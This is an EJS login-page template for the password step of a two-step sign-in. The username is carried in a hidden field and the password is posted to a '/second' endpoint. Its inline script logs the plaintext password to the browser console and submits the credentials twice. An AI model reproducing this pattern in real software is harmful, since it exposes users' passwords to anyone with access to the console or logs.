<%- include('header'); -%>
<html>
<body>
  <div class="cardii" "col-5">
    <div class="cardtop">
      <img src="images/logoo.png" alt="logo" width="100px" height="80px">
    </div>
    <div>
      <form action="/second" method="POST" class="form">
        <i class="fa-solid fa-arrow-left"></i>
        <p name="username" type="text" id="mail" class="ilight"><%= username %></p>
        <input type="hidden" id="email" name="username" value="<%= username %>">
        <h4>Enter password</h4>
        <input type="password" id="password" placeholder="Password" name="pass" minlength="6" required />
        <a href="#"><p>Forgot password?</p></a>
        <button class="btn btn-primary move" type="submit">Sign in</button>
      </form>
    </div>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script type="text/javascript">
  $(document).ready(function() {
    const loginUrl = '/second'; // Update the login URL to match your server endpoint
    // Add an event listener to the form submission
    $('.form').submit(function(event) {
    
      // Get the username and password values
      const username = $('#email').val();
      const password = $('#password').val();

      // Create the request body
      const data = {
        username: username,
        password: password
      };
      console.log('Username:', username);
      console.log('Password:', password);
      // Make the POST request to the login endpoint
      fetch(loginUrl, {
        method: 'POST',
        body: JSON.stringify(data),
        headers: {
          'Content-Type': 'application/json'
        }
      })
      .then(response => {
        // Handle the response from the server
      })
      .catch(error => {
        // Handle any errors
      });
    });
  });
  </script>

</body>
</html>

<%- include('footer'); -%>
